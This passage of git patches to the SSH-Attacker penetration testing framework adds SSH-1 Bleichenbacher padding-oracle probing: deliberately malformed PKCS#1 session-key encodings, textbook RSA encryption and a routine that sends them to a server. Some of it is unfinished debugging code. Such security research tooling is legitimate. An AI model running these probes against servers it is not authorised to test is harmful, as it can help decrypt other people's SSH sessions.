insertions(+), 6 deletions(-) create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/PkcsConverter.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 8699b3467..d547d2e5b 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -10,6 +10,8 @@ import static de.rub.nds.tlsattacker.util.ConsoleLogger.CONSOLE; import com.google.common.primitives.Bytes; +import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; import de.rub.nds.sshattacker.attacks.general.KeyFetcher; @@ -17,22 +19,31 @@ import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Ssh1MockOracle; +import de.rub.nds.sshattacker.attacks.pkcs1.util.PkcsConverter; import de.rub.nds.sshattacker.attacks.response.EqualityError; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; +import de.rub.nds.sshattacker.core.constants.RunningModeType; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.ParallelExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; import de.rub.nds.sshattacker.core.workflow.action.GenericReceiveAction; +import de.rub.nds.sshattacker.core.workflow.action.ReceiveAction; +import de.rub.nds.sshattacker.core.workflow.action.SendAction; +import de.rub.nds.sshattacker.core.workflow.factory.WorkflowConfigurationFactory; +import de.rub.nds.sshattacker.core.workflow.factory.WorkflowTraceType; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; @@ -298,6 +309,7 @@ private String sendSinglePacket(byte[] msg) { Config sshConfig = getSshConfig(); sshConfig.setWorkflowExecutorShouldClose(false); + sshConfig.setDoNotEncryptMessages(false); WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(sshConfig, msg); GenericReceiveAction receiveOracleResultAction = new GenericReceiveAction(); @@ -308,7 +320,28 @@ private String sendSinglePacket(byte[] msg) { workflowExecutor.executeWorkflow(); ProtocolMessage lastMessage = receiveOracleResultAction.getReceivedMessages().get(0); - LOGGER.debug("Received: {}", lastMessage.toString()); + LOGGER.warn("Received: {}", lastMessage.toString()); + System.exit(0); + return lastMessage.toString(); + } + + private String sendSinglePacket(byte[] msg, byte[] plain) { + + Config sshConfig = getSshConfig(); + sshConfig.setWorkflowExecutorShouldClose(false); + sshConfig.setDoNotEncryptMessages(false); + WorkflowTrace trace = + BleichenbacherWorkflowGenerator.generateWorkflow(sshConfig, msg, plain); + + GenericReceiveAction receiveOracleResultAction = new GenericReceiveAction(); + trace.addSshAction(receiveOracleResultAction); + + State state = new State(sshConfig, trace); + WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); + workflowExecutor.executeWorkflow(); + + ProtocolMessage lastMessage = receiveOracleResultAction.getReceivedMessages().get(0); + LOGGER.warn("Received: {}", lastMessage.toString()); System.exit(0); return lastMessage.toString(); } @@ -336,6 +369,142 @@ private BigInteger[] RSAKeyPairGenerator(int bitlength) { return new BigInteger[] {e, d, N}; } + /** + * Performs wrong padding of the session key. + * + * @param sessionID the session ID + * @param plainSessionKey the plain session key + * @return the padded and encrypted result + * @throws CryptoException if an error occurs during the process + */ + private byte[] wrongPaddingSessionKey(byte[] sessionID, byte[] plainSessionKey) + throws CryptoException { + + // XOR Session Key with Session ID + byte[] sessionKey = plainSessionKey.clone(); + int i = 0; + for (byte sesseionByte : sessionID) { + sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); + } + + // Choose correct encryptions for inner and outer + AbstractCipher innerCipher, outerCipher; + + int innerBitlengh, outerBitlenght; + + if (hostPublicKey.getModulus().bitLength() < serverPublicKey.getModulus().bitLength()) { + LOGGER.debug("Host is inner"); + innerCipher = CipherFactory.getRsaTextbookCipher(hostPublicKey); + outerCipher = CipherFactory.getRsaTextbookCipher(serverPublicKey); + innerBitlengh = hostPublicKey.getModulus().bitLength(); + outerBitlenght = serverPublicKey.getModulus().bitLength(); + } else { + LOGGER.debug("Host is outer"); + innerCipher = CipherFactory.getRsaTextbookCipher(serverPublicKey); + outerCipher = CipherFactory.getRsaTextbookCipher(hostPublicKey); + innerBitlengh = serverPublicKey.getModulus().bitLength(); + outerBitlenght = hostPublicKey.getModulus().bitLength(); + } + + // Do padding and encrpytion according to modulus bit lenghtes + byte[] padded = PkcsConverter.doPkcs1Encoding(sessionKey, innerBitlengh / 8); + LOGGER.info("Padded: {}", ArrayConverter.bytesToRawHexString(padded)); + byte[] encrypted = innerCipher.encrypt(padded); + + byte[] nextPadded = PkcsConverter.doPkcs1Encoding(encrypted, outerBitlenght / 8); + LOGGER.info("Next Padded: {}", ArrayConverter.bytesToRawHexString(nextPadded)); + byte[] nextEncrypted = outerCipher.encrypt(nextPadded); + + // Return padded and encrypted result + return nextEncrypted; + } + + /** + * Performs a testing procedure with different paddings. Throws a CryptoException if an error + * occurs during the process. + * + * @throws CryptoException if an error occurs during the process + */ + private void testDifferentPaddings() throws CryptoException { + + // Receive keys from server + getPublicKeys(); + getHostPublicKey(); + getServerPublicKey(); + + // Create workflowtrace to receive cookie and calculate session id + Config sshConfig = getSshConfig(); + sshConfig.setWorkflowExecutorShouldClose(false); + sshConfig.setDoNotEncryptMessages(false); + WorkflowTrace trace = + new WorkflowConfigurationFactory(sshConfig) + .createWorkflowTrace( + WorkflowTraceType.KEX_SSH1_ONLY, RunningModeType.CLIENT); + + ReceiveAction receiveAction = new ReceiveAction(new ServerPublicKeyMessage()); + trace.addSshAction(receiveAction); + + State state = new State(sshConfig, trace); + WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); + workflowExecutor.executeWorkflow(); + + List> receivedMessages = receiveAction.getReceivedMessages(); + LOGGER.info("recived size: {}", receivedMessages.size()); + LOGGER.info(receivedMessages.get(0).toString()); + byte[] sessionID = null; + if (!receivedMessages.isEmpty() + && receivedMessages.get(0) instanceof ServerPublicKeyMessage) { + + byte[] sessionCookie = + ((ServerPublicKeyMessage) receivedMessages.get(0)) + .getAntiSpoofingCookie() + .getValue(); + sessionID = calculateSessionID(sessionCookie); + LOGGER.info("SessionID is: {}", ArrayConverter.bytesToRawHexString(sessionID)); + LOGGER.info("Cookie is: {}", ArrayConverter.bytesToRawHexString(sessionCookie)); + } + + // Cleanup old trace to remove already executed workflowelements, prevent creating a new + // connection and use the existing one + trace.removeSshAction(1); + trace.removeSshAction(2); + trace.removeSshAction(0); + sshConfig.setWorkflowExecutorShouldOpen(false); + + // Create random session key, padd it wrong and create a correct session key message, set + // the plain and the encrypted key to be used in later worfklow correctly + Random random = new Random(); + byte[] sessionKey = new byte[32]; + random.nextBytes(sessionKey); + + byte[] encryptedSecret = wrongPaddingSessionKey(sessionID, sessionKey); + + ClientSessionKeyMessage clientSessionKeyMessage = new ClientSessionKeyMessage(); + ModifiableByteArray encryptedSecretArray = new ModifiableByteArray(); + ModifiableByteArray plainSecretArray = new ModifiableByteArray(); + encryptedSecretArray.setModification( + ByteArrayModificationFactory.explicitValue(encryptedSecret)); + plainSecretArray.setModification(ByteArrayModificationFactory.explicitValue(sessionKey)); + clientSessionKeyMessage.setEncryptedSessioKey(encryptedSecretArray); + clientSessionKeyMessage.setPlaintextSessioKey(plainSecretArray); + trace.addSshAction(new SendAction(clientSessionKeyMessage)); + + // receive answer from the server + GenericReceiveAction receiveOracleResultAction = new GenericReceiveAction(); + trace.addSshAction(receiveOracleResultAction); + + try { + workflowExecutor.executeWorkflow(); + // print results + ProtocolMessage lastMessage = receiveOracleResultAction.getReceivedMessages().get(0); + LOGGER.warn("Received: {}", lastMessage.toShortString()); + } catch (WorkflowExecutionException ex) { + LOGGER.error("got a Parser Exception"); + LOGGER.info( + "Server replied with unknown message -> it seems to be working correctly since the message could not be parsed"); + } + } + @Override public void executeAttack() { if (!config.getSendSinglePacket().isEmpty()) { @@ -362,6 +531,13 @@ public void executeAttack() { } } + try { + testDifferentPaddings(); + } catch (CryptoException e) { + throw new RuntimeException(e); + } + System.exit(0); + /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; @@ -536,8 +712,8 @@ public void executeAttack() { jo.put("plaintext", ArrayConverter.bytesToRawHexString(solutionByteArray)); jo.put("ciphertext", ArrayConverter.bytesToRawHexString(encryptedSecret)); jo.put("time", timeElapsed); - jo.put("inner-Tries", attacker.getCounterInnerBleichenbacher()); - jo.put("outer-Tries", attacker.getCounterOuterBleichenbacher()); + jo.put("inner_tries", attacker.getCounterInnerBleichenbacher()); + jo.put("outer_tries", attacker.getCounterOuterBleichenbacher()); jo.put("trimmed_outer", attacker.isOuterTrimmed()); jo.put("trimmed_inner", attacker.isInnerTrimmed()); jo.put("outer_trimmers", attacker.getOuterTrimmers()); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java index 08ca99bbd..23cc84e8f 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java @@ -47,6 +47,28 @@ public static WorkflowTrace generateWorkflow(Config sshConfig, byte[] encryptedS return trace; } + + public static WorkflowTrace generateWorkflow( + Config sshConfig, byte[] encryptedSecret, byte[] plainSecret) { + WorkflowTrace trace = + new WorkflowConfigurationFactory(sshConfig) + .createWorkflowTrace( + WorkflowTraceType.KEX_SSH1_ONLY, RunningModeType.CLIENT); + + trace.addSshAction(new ReceiveAction(new ServerPublicKeyMessage())); + + ClientSessionKeyMessage clientSessionKeyMessage = new ClientSessionKeyMessage(); + ModifiableByteArray encryptedSecretArray = new ModifiableByteArray(); + ModifiableByteArray plainSecretArray = new ModifiableByteArray(); + encryptedSecretArray.setModification( + ByteArrayModificationFactory.explicitValue(encryptedSecret)); + plainSecretArray.setModification(ByteArrayModificationFactory.explicitValue(plainSecret)); + clientSessionKeyMessage.setEncryptedSessioKey(encryptedSecretArray); + clientSessionKeyMessage.setPlaintextSessioKey(plainSecretArray); + trace.addSshAction(new SendAction(clientSessionKeyMessage)); + + return trace; + } /** * Generates a dynamic workflow that encrypts the given encoded secret during execution * diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/PkcsConverter.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/PkcsConverter.java new file mode 100644 index 000000000..37a543f0f --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/PkcsConverter.java @@ -0,0 +1,80 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2024 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1.util; + +import java.util.Arrays; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class PkcsConverter { + + private static final Logger LOGGER = LogManager.getLogger(); + + public PkcsConverter() {} + + public static byte[] doPkcs1Encoding(byte[] data, int modulusLenght) { + int paddingLength = modulusLenght - 3 - data.length; + LOGGER.info(paddingLength); + byte[] padding = new byte[paddingLength]; + Arrays.fill(padding, (byte) 0xFF); + byte[] encodedData = new byte[data.length + paddingLength + 2]; + encodedData[0] = 0x02; + System.arraycopy(padding, 0, encodedData, 1, padding.length); + encodedData[paddingLength + 3] = 0x00; + System.arraycopy(data, 0, encodedData, paddingLength + 2, data.length); + return encodedData; + } + + public static byte[] doPkcs1EncodingWithWrongHeader(byte[] data, int modulusLenght) { + int paddingLength = modulusLenght - 3 - data.length; + byte[] padding = new byte[paddingLength]; + Arrays.fill(padding, (byte) 0xFF); + byte[] encodedData = new byte[data.length + paddingLength + 3]; + encodedData[0] = 0x00; + encodedData[1] = 0x49; + System.arraycopy(padding, 0, encodedData, 2, padding.length); + encodedData[paddingLength + 3] = 0x00; + System.arraycopy(data, 0, encodedData, paddingLength + 3, data.length); + return encodedData; + } + + public static byte[] doPkcs1EncodingWithWrongZeroByte( + byte[] data, int modulusLenght, int position) { + + byte[] noZeroByte = doPkcs1EncodingWithOutZeroByte(data, modulusLenght); + noZeroByte[position] = 0x00; + + return noZeroByte; + } + + public static byte[] doPkcs1EncodingWithOutZeroByte(byte[] data, int modulusLenght) { + int paddingLength = modulusLenght - 2 - data.length; + byte[] padding = new byte[paddingLength]; + Arrays.fill(padding, (byte) 0xFF); + byte[] encodedData = new byte[data.length + paddingLength + 2]; + encodedData[0] = 0x00; + encodedData[1] = 0x02; + System.arraycopy(padding, 0, encodedData, 2, padding.length); + System.arraycopy(data, 0, encodedData, paddingLength + 2, data.length); + return encodedData; + } + + public static byte[] doPkcsDecoding(byte[] data) { + // do PKCS1.5 Decoding of data + int index = 0; + for (int i = 0; i < data.length; i++) { + if (data[i] == 0x00) { + index = i; + break; + } + } + byte[] decodedData = new byte[data.length - index - 1]; + System.arraycopy(data, index + 1, decodedData, 0, decodedData.length); + return decodedData; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java index 1f5c55e6b..f41b79f6d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java @@ -55,8 +55,6 @@ public static AbstractCipher getOaepCipher(KeyExchangeAlgorithm keyExchangeAlgor case RSA2048_SHA256: return new OaepCipher( key, "RSA/ECB/OAEPWithSHA-256AndMGF1Padding", "SHA-256", "MGF1"); - case RSA1024_PCKS1: - return new OaepCipher(key, "RSA/ECB/PKCS1Padding", "SHA-1", "MGF1"); default: LOGGER.warn( "Cannot generate OAEP cipher for key exchange algorithm: '{}' - Using NoneCipher!", @@ -69,6 +67,10 @@ public static AbstractCipher getRsaPkcs1Cipher(Key key) { return new RsaPkcs1Cipher(key); } + public static AbstractCipher getRsaTextbookCipher(Key key) { + return new RsaTextbookCipher(key); + } + private CipherFactory() { super(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java new file mode 100644 index 000000000..3f0d7b987 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java @@ -0,0 +1,95 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.crypto.cipher; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import java.math.BigInteger; +import java.security.Key; +import javax.crypto.*; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaTextbookCipher extends AbstractCipher { + + private static final Logger LOGGER = LogManager.getLogger(); + + private Cipher cipher; + + private final Key key; + + private BigInteger publicExponent; + private BigInteger modulus; + private BigInteger privateExponent; + + public RsaTextbookCipher(Key key) { + this.key = key; + } + + @Override + public byte[] encrypt(byte[] plainData) throws CryptoException { + prepareCipher(Cipher.ENCRYPT_MODE); + String dataString = ArrayConverter.bytesToRawHexString(plainData); + BigInteger dataBigInt = new BigInteger(dataString, 16); + BigInteger encryptedBigInt = dataBigInt.modPow(publicExponent, modulus); + return ArrayConverter.bigIntegerToByteArray(encryptedBigInt); + } + + @Override + public byte[] encrypt(byte[] plainData, byte[] iv) throws CryptoException { + throw new UnsupportedOperationException("Encryption with IV not supported."); + } + + @Override + public byte[] encrypt(byte[] plainData, byte[] iv, byte[] additionalAuthenticatedData) + throws CryptoException { + throw new UnsupportedOperationException("AEAD encryption not supported."); + } + + @Override + public byte[] decrypt(byte[] encryptedData) throws CryptoException { + prepareCipher(Cipher.DECRYPT_MODE); + String dataString = ArrayConverter.bytesToRawHexString(encryptedData); + BigInteger dataBigInt = new BigInteger(dataString, 16); + BigInteger decryptedBigInt = dataBigInt.modPow(privateExponent, modulus); + return ArrayConverter.bigIntegerToByteArray(decryptedBigInt); + } + + @Override + public byte[] decrypt(byte[] encryptedData, byte[] iv) throws CryptoException { + throw new UnsupportedOperationException("Decryption with IV not supported."); + } + + @Override + public byte[] decrypt(byte[] encryptedData, byte[] iv, byte[] additionalAuthenticatedData) + throws CryptoException, AEADBadTagException { + throw new UnsupportedOperationException("AEAD decryption not supported."); + } + + @Override + public EncryptionAlgorithm getAlgorithm() { + return null; + } + + private void prepareCipher(int mode) { + if (key instanceof CustomRsaPublicKey && mode == Cipher.ENCRYPT_MODE) { + CustomRsaPublicKey publicKey = (CustomRsaPublicKey) key; + modulus = publicKey.getModulus(); + publicExponent = publicKey.getPublicExponent(); + } else if (key instanceof CustomRsaPrivateKey && mode == Cipher.DECRYPT_MODE) { + CustomRsaPrivateKey privateKey = (CustomRsaPrivateKey) key; + modulus = privateKey.getModulus(); + privateExponent = privateKey.getPrivateExponent(); + } else { + LOGGER.error("Not a valid key or not the correct key for this mode"); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java index 5ce7c4f44..ceb1976aa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java @@ -79,6 +79,12 @@ public void setPlaintextSessioKey(ModifiableByteArray plaintextSessioKey) { this.plaintextSessioKey = plaintextSessioKey; } + public void setPlaintextSessioKey(byte[] plaintextSessioKey) { + this.plaintextSessioKey = + ModifiableVariableFactory.safelySetValue( + this.plaintextSessioKey, plaintextSessioKey); + } + public List getChosenProtocolFlags() { return chosenProtocolFlags; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index cfad93f28..81e06abc7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; @@ -75,7 +76,16 @@ private void prepareSessionKey() throws CryptoException { Random random = new Random(); byte[] sessionKey = new byte[32]; random.nextBytes(sessionKey); - byte[] plainSessionKey = sessionKey.clone(); + + getObject().setPlaintextSessioKey(sessionKey); + + // byte[] plainSessionKey = sessionKey.clone(); + byte[] plainSessionKey = getObject().getPlaintextSessioKey().getValue(); + LOGGER.debug( + "Original plain Session Key is: {}", + ArrayConverter.bytesToRawHexString(sessionKey)); + LOGGER.debug( + "Plain Session Key is: {}", ArrayConverter.bytesToRawHexString(plainSessionKey)); // Use xored sessionkey for transmission byte[] sessionID = chooser.getContext().getSshContext().getSshv1SessionID(); @@ -84,6 +94,8 @@ private void prepareSessionKey() throws CryptoException { sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); } + LOGGER.debug("XORED Session Key is: {}", ArrayConverter.bytesToRawHexString(sessionKey)); + if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { serverPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); } else { From 37174612087ee48026dfa0eabb2cb082d912ed1b Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Wed, 28 Feb 2024 22:33:17 +0100 Subject: [PATCH 143/176] debugging ssh-scanner --- .../sshattacker/core/layer/impl/TcpLayer.java | 2 - .../packet/parser/BinaryPacketParser.java | 9 +- .../KeyExchangeInitMessageHandler.java | 8 +- .../KeyExchangeInitMessagePreparator.java | 94 ------------------- .../action/DynamicKeyExchangeAction.java | 9 +- 5 files changed, 20 insertions(+), 102 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index fb7e4b6c0..034da8d50 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -75,13 +75,11 @@ public HintedInputStream getDataStream() throws IOException { readByte = context.getTransportHandler().fetchData(1); receiveBuffer = ArrayConverter.concatenate(receiveBuffer, readByte); } while (readByte.length > 0 && readByte[0] != CharConstants.NEWLINE); - currentInputStream = new HintedInputStreamAdapterStream(new ByteArrayInputStream(receiveBuffer)); return currentInputStream; } else { - currentInputStream = new HintedInputStreamAdapterStream(getTransportHandler().getInputStream()); return currentInputStream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index 83dc18c45..8c42bbe0d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -151,6 +151,7 @@ private void parseETMPacket(BinaryPacket binaryPacket) { } private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { + LOGGER.debug("Parsing EAM"); binaryPacket.prepareComputations(); PacketCryptoComputations computations = binaryPacket.getComputations(); // This cast is safe due to EAM being exclusively used with PacketMacedCipher @@ -162,11 +163,14 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { */ int blockSize = activeDecryptCipher.getEncryptionAlgorithm().getBlockSize(); + LOGGER.debug("Blocksize is: {}", blockSize); + int decryptedByteCount = 0; // Loop required for stream cipher support (effective block length is 1 in this case) byte[] firstBlock = new byte[0]; byte[] firstBlockEncrypted = new byte[0]; do { + LOGGER.debug("Blocksize 2 is: {}", blockSize); byte[] block = parseByteArrayField(blockSize); byte[] decryptedBlock; if (activeDecryptCipher.getEncryptionAlgorithm().getIVSize() > 0) { @@ -177,11 +181,12 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { } else { decryptedBlock = activeDecryptCipher.getCipher().decrypt(block); } + LOGGER.debug("Decryption Succesfull"); firstBlock = ArrayConverter.concatenate(firstBlock, decryptedBlock); firstBlockEncrypted = ArrayConverter.concatenate(firstBlockEncrypted, block); decryptedByteCount += blockSize; } while (decryptedByteCount < BinaryPacketConstants.LENGTH_FIELD_LENGTH); - + LOGGER.debug("DONE with Loop"); computations.setPlainPacketBytes(firstBlock, true); binaryPacket.setLength( @@ -193,7 +198,7 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { Bytes.concat( firstBlockEncrypted, parseByteArrayField(binaryPacket.getLength().getValue()))); - + LOGGER.debug("Mac Size: {}", activeDecryptCipher.getMacAlgorithm().getOutputSize()); binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index d1592cba4..a88e5a6ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -360,9 +360,11 @@ private void pickAlgorithms() { .orElse(null)); } - LOGGER.info( - "[bro] Picking KEX Algorithm, Setting Hostkey to {}", - sshContext.getHostKeyAlgorithm()); + LOGGER.debug( + "[bro] Picking KEX Algorithm, Setting Hostkey to {} \n Mac to {} and {}", + sshContext.getHostKeyAlgorithm(), + sshContext.getMacAlgorithmClientToServer(), + sshContext.getMacAlgorithmServerToClient()); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java index 3549e1785..470cde5fe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java @@ -20,100 +20,6 @@ public KeyExchangeInitMessagePreparator(Chooser chooser, KeyExchangeInitMessage } @Override - /* public void prepareMessageSpecificContents() { - if (chooser.getContext().getSshContext().isClient()) { - getObject().setCookie(chooser.getClientCookie()); - getObject() - .setKeyExchangeAlgorithms( - chooser.getClientSupportedKeyExchangeAlgorithms(), true); - getObject() - .setServerHostKeyAlgorithms( - chooser.getClientSupportedHostKeyAlgorithms(), true); - getObject() - .setEncryptionAlgorithmsClientToServer( - chooser.getClientSupportedEncryptionAlgorithmsClientToServer(), true); - getObject() - .setEncryptionAlgorithmsServerToClient( - chooser.getClientSupportedEncryptionAlgorithmsServerToClient(), true); - getObject() - .setMacAlgorithmsClientToServer( - chooser.getClientSupportedMacAlgorithmsClientToServer(), true); - getObject() - .setMacAlgorithmsServerToClient( - chooser.getClientSupportedMacAlgorithmsServerToClient(), true); - getObject() - .setCompressionMethodsClientToServer( - chooser.getClientSupportedCompressionMethodsClientToServer(), true); - getObject() - .setCompressionMethodsServerToClient( - chooser.getClientSupportedCompressionMethodsServerToClient(), true); - getObject() - .setLanguagesClientToServer( - chooser.getClientSupportedLanguagesClientToServer() - .toArray(new String[0]), - true); - getObject() - .setLanguagesServerToClient( - chooser.getClientSupportedLanguagesServerToClient() - .toArray(new String[0]), - true); - getObject() - .setFirstKeyExchangePacketFollows( - chooser.getClientFirstKeyExchangePacketFollows()); - getObject().setReserved(chooser.getClientReserved()); - - chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setClientKeyExchangeInit(getObject()); - } else { - getObject().setCookie(chooser.getServerCookie()); - getObject() - .setKeyExchangeAlgorithms( - chooser.getServerSupportedKeyExchangeAlgorithms(), true); - getObject() - .setServerHostKeyAlgorithms( - chooser.getServerSupportedHostKeyAlgorithms(), true); - getObject() - .setEncryptionAlgorithmsClientToServer( - chooser.getServerSupportedEncryptionAlgorithmsClientToServer(), true); - getObject() - .setEncryptionAlgorithmsServerToClient( - chooser.getServerSupportedEncryptionAlgorithmsServerToClient(), true); - getObject() - .setMacAlgorithmsClientToServer( - chooser.getServerSupportedMacAlgorithmsClientToServer(), true); - getObject() - .setMacAlgorithmsServerToClient( - chooser.getServerSupportedMacAlgorithmsServerToClient(), true); - getObject() - .setCompressionMethodsClientToServer( - chooser.getServerSupportedCompressionMethodsClientToServer(), true); - getObject() - .setCompressionMethodsServerToClient( - chooser.getServerSupportedCompressionMethodsServerToClient(), true); - getObject() - .setLanguagesClientToServer( - chooser.getServerSupportedLanguagesClientToServer() - .toArray(new String[0]), - true); - getObject() - 